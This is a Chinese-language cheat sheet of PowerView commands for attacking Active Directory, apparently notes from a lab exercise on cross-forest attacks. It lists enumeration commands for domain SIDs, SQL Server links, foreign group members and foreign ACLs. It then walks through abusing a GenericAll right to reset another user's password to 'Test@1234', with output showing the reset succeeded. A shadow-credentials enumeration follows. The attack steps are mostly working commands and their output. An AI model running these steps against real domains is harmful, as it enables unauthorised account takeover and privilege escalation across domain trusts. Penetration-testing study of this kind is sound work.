powerview.ps1
1. 常用命令
导入 PowerView 模块
Import-Module .\PowerView.ps1
获取当前域的SID
Get-DomainSID
枚举 SQL Server 链接服务器（linked servers）
Get-SQLServerLink
枚举目标域中包含外部安全主体（来自其他域/林的用户）的组成员关系
跨林攻击-外部安全主体&ACLs > 1.1.2. 枚举Logistics 域内各个组的用户
Get-DomainForeignGroupMember -Domain logistics.ad
枚举外部安全主体在目标域对象上持有的 ACL（先将账户名转换为 SID，再按 SecurityIdentifier 过滤）
跨林攻击-外部安全主体&ACLs > 1.3.1. 枚举外部ACL主体
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Users\Administrator\Downloads> $sid = Convert-NameToSid ava
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain logistics.ad | ? {$_.SecurityIdentifier -eq $sid}
AceType : AccessAllowed
ObjectDN : CN=jessica,CN=Users,DC=logistics,DC=ad
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-186204973-2882451676-2899969076-6601
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2432454459-173448545-3375717855-6101
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $pass = ConvertTo-SecureString 'Test@1234' -AsPlainText -Force
PS C:\Tools> Set-DomainUserPassword -identity jessica -AccountPassword $pass -domain logistics.ad -verbose
VERBOSE: [Get-PrincipalContext] Binding to domain 'logistics.ad'
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'jessica'
VERBOSE: [Set-DomainUserPassword] Password for user 'jessica' successfully reset
枚举影子凭据（Shadow Credentials）：查找 msDS-KeyCredentialLink 属性已被写入的账户
#查询 msDS-KeyCredentialLink 属性不为空的用户
PS C:\Users\jeffry\Desktop> Get-DomainUser -Filter '(msDS-KeyCredentialLink=*)'
logoncount : 5
msds-keycredentiallink : B:828:00020000200001A98B9A34A7566C0B8633DF6ADBF934CFE79BE8617097536146F1F062ED29659920000272FF
2D049DD5FE5E47932D12B0E3C0D9922133B1A18B06B2E855C441B606418B1B01035253413100080000030000000001
00000000000000000000010001B5937A146A2068FF789505A762FD841BC944CF85A740E47C9195B6DE31B44915352B
408A8B8515CB346D96F0C444C8BDB56E80AD01A21F34E4DEAC3E2B0562D72812634679D10F2A5B4C214C4DB8EF58D3
1933C9163D6A426A79BDA4CCBDDC5A1889C234A416F0F3FE7308F7939D0B0FFBDC8D89B080617A407819D4F2C0DEA4
69AC1B3F0F96428B0D84722739A033E180F6A24B21C39210E3F05999BE5AEC8DB9BAE0EAAF9D5006AC54637D6EDD47
834176E850875F88A4B0D944BDC3A63E30D948EBFEC02F4332424F65342018714E5BF971232F0AB6E302393202FF73
488D5B4D62B43E52DAD19C20850BF40028D477CFC3543121161EAF84926E9F40443D0100040101000500100006937A
2D4642F339A196FC2C750D2F4C890200070100080008B1DB0C23BC98DA01080009B1DB0C23BC98DA01:CN=Gabriel,
CN=Users,DC=lab,DC=local
badpasswordtime : 01/01/1601 01:00:00
distinguishedname : CN=Gabriel,CN=Users,DC=lab,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : Gabriel
lastlogontimestamp : 27/04/2024 18:18:37
userprincipalname : gabriel@lab.local
name : Gabriel
objectsid : S-1-5-21-2570265163-3918697770-3667495639-4602
samaccountname : gabriel
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 27/04/2024 16:18:37
instancetype : 4
usncreated : 688697
objectguid : 03cd82aa-3a8c-4ba0-bcf8-850ba94cfd73
lastlogoff : 01/01/1601 01:00:00
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata : {14/02/2024 20:21:05, 14/02/2024 20:16:19, 14/02/2024 20:15:00, 01/01/1601 00:00:01}
givenname : Gabriel
lastlogon : 27/04/2024 18:18:37
badpwdcount : 0
cn : Gabriel
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 14/02/2024 20:15:00
primarygroupid : 513
pwdlastset : 14/02/2024 21:15:00
usnchanged : 708837